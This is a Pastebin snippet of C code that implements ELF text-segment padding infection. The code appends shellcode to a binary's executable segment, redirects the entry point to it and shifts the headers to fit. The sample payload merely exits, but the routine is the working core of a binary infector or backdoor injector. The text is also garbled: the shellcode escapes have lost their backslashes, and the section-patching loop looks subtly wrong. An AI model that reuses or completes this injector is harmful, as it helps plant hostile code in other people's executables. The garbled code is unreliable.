Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // exit(9)
- unsigned char shellcode[] = "xb0x3c"
- "x40xb7x09"
- "x0fx05";
- for (i = 0; i < ehdr->e_phnum; ++i)
- {
- if (text_found)
- {
- phdr[i].p_offset += PAGE_SIZE;
- continue;
- }
- if (phdr[i].p_type == PT_LOAD && phdr[i].p_flags == ( PF_R | PF_X))
- {
- // set buffer to the end of the text segment
- buffer_addr = phdr[i].p_vaddr + phdr[i].p_filesz;
- text_end = phdr[i].p_vaddr + phdr[i].p_filesz;
- printf("TEXT SEGMENT ends at 0x%xn", text_end);
- text_idx = i;
- puts("Changing entry point...");
- ehdr->e_entry = (Elf64_Addr)buffer_addr;
- memmove(mapped_file + phdr[i].p_offset + phdr[i].p_filesz,
- shellcode, buffer_len);
- phdr[i].p_filesz += buffer_len;
- phdr[i].p_memsz += buffer_len;
- text_found++;
- }
- }
- //patch sections
- for (i = 0; i < ehdr->e_shnum; ++i)
- {
- if (shdr->sh_offset >= buffer_addr)
- shdr->sh_offset += PAGE_SIZE;
- else
- if (shdr->sh_size + shdr->sh_addr == buffer_addr)
- shdr->sh_size += buffer_len;
- }
- ehdr->e_shoff += PAGE_SIZE;
- close(fd);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
